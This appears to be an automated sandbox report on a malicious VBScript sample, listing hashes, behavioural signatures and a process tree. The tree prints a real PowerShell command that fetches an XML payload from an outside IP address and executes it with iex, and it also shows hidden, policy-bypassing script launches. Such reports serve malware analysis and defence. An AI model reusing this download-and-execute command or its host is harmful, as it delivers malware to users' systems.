Analysis
-
max time kernel
144s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
07/10/2023, 10:55
Static task
static1
Behavioral task
behavioral1
Sample
NEAS_JC.vbs
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
NEAS_JC.vbs
Resource
win10v2004-20230915-en
General
-
Target
NEAS_JC.vbs
-
Size
432B
-
MD5
274146f1ccf1afeafb17d64e0b6bd914
-
SHA1
4bd8ce0f9ba56cc60a35e63d30462881589bf5c7
-
SHA256
1bdfff81a5aed260c7d61de73e067747111d0b6944a0895bc564264dfc6cfca8
-
SHA512
f3a763036c76f82f343cca0133d8d9afbf7c5c0c7f3d2ec1d6cad837b71b12c07a3f9da70cb4466552c20f5330a0d3c08c8173eb6e3dd51ba8067a9e3953c1e8
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 16 5108 powershell.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 5108 powershell.exe 5108 powershell.exe 664 powershell.exe 664 powershell.exe 664 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 5108 powershell.exe Token: SeDebugPrivilege 664 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 648 wrote to memory of 5108 648 WScript.exe 85 PID 648 wrote to memory of 5108 648 WScript.exe 85 PID 5108 wrote to memory of 4284 5108 powershell.exe 99 PID 5108 wrote to memory of 4284 5108 powershell.exe 99 PID 4284 wrote to memory of 2780 4284 WScript.exe 100 PID 4284 wrote to memory of 2780 4284 WScript.exe 100 PID 2780 wrote to memory of 664 2780 cmd.exe 102 PID 2780 wrote to memory of 664 2780 cmd.exe 102 PID 5024 wrote to memory of 4408 5024 WScript.exe 113 PID 5024 wrote to memory of 4408 5024 WScript.exe 113 PID 4408 wrote to memory of 4128 4408 cmd.exe 115 PID 4408 wrote to memory of 4128 4408 cmd.exe 115 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\NEAS_JC.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:648 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $xmldoc = New-Object System.Xml.XmlDocument; $xmldoc.'Load'('http://193.26.115.167:222/1.xml'); iex $xmldoc.command.a.execute2⤵
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5108 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Public\ini.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4284 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\ini.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:2780 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\ini.ps1'"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:664
-
-
-
-
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Public\ReklamX.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5024 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\ReklamX.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:4408 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Public\ReklamX.ps1"3⤵PID:4128
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD56c36bb464ae2e6ef913b83d7048e8e94
SHA14e073a932c58b067164f93b48ed10d62969f4776
SHA2564230cb0a9d772f5ee4949502aeb7224fd304140246567dae5c1a37e451396848
SHA512b50d381d923c78e586c3304f392f64b31a820802a09342edc4dcb7c12bc59207d044355ea3149242727b7e9806a2f3016bb8dbf6566beb16bc0c30d6a5d0629e
-
Filesize
2KB
MD52d87fbdf06bb8c38123bb25130855cc7
SHA18bb251c3ca8f0c2612ab664ff0ef0ca3e3909ca6
SHA25655c277069721bddf18f293608727ca0d87d7a91d3fd3c151eb94a5d9f0f9806b
SHA5122511ad8c8f535ae5a1552bbbfaf78168d5b733240e014ded7a0bd98898d0e49d5eccfb11c928b2158e1aff2e8f5ecf6079bd62a496488b8717417afaf2750bdd
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
190B
MD575db134e7941ac7093e2a0a82dd5c710
SHA152b1e5d355229302ce1def826d3842d3b346037d
SHA2562a407f7b0e9fc016bdaa72700d28785fb61c49418c55e7be09dc68f71924379f
SHA512d4ffe32ef04e2a0d6660aa52998b463d164415aec406d723dad3192887a8c82ecaaa03bea79f1d6032f41fc7c6dc0220fc0d4be17a310cd6698081a2fda5cc97
-
Filesize
167B
MD55ae14dfcba7c2e476295b205eae785f0
SHA12c7e6db3ee6e83eeb17c0bc7e33e52bd6e4944d9
SHA25605ddb55f4386b1b8d477c7b828ee44bda58b5cc1ab0d06e20a17acd84b44045d
SHA5127b492fbbda3357149e97b59f4f2d2490e3b32e5ae31b66deaa11274a2f8c8a0cddb6a3e1a84d957ebcfcc5d3afb786aef9c746b18e940a28e819be98907ad4e5
-
Filesize
192B
MD550d67ac3dfe55559558e009ca80eb632
SHA12bf8f4d3bb1944b02b5373ff81ae2c2eda307450
SHA25681b3e8967d14e93c9a04224969c520102ad69035aef2834a89d152c7185c7a6e
SHA51249499b556ca00ee445d35cec051557759b3503b4ceea7e8a2226b317368a160340e4d878b970384cf902939807541617a2049fb67ecfd1148dea4d4ebc0255d5
-
Filesize
747B
MD571d276530525756ea14087eaec0bc465
SHA18789d58df8c41d1a42be25e23bc9d73213f909f4
SHA2562a3ef26379e1a38f96157b0b675609f1240302ae709147bea9cbf37a2519c512
SHA512178003d1ce2c9b91c0a33e707161145be71437ef9d31d0befa2ee1e6dca8b3fa6d7c2aebffa266f38dac07f5e25f3c753864ab93b0a60b89440254602199ff96
-
Filesize
161B
MD51e651ff9a99f0a76bbd654c91cf500da
SHA19508362424f9870771cb1b54d6301ce42788bc29
SHA256d066694bea475db86232d68bbfa35f23efdf2813e4b60aad4529409672dec6bf
SHA512b04fad9255f5a771d57838d6ab1962a7b83ea1fe340951f079705cae232feb9975b0b89fd211b3aadabd6dcfbec44e7b49a5d8d05230eea94da7cad000f35a29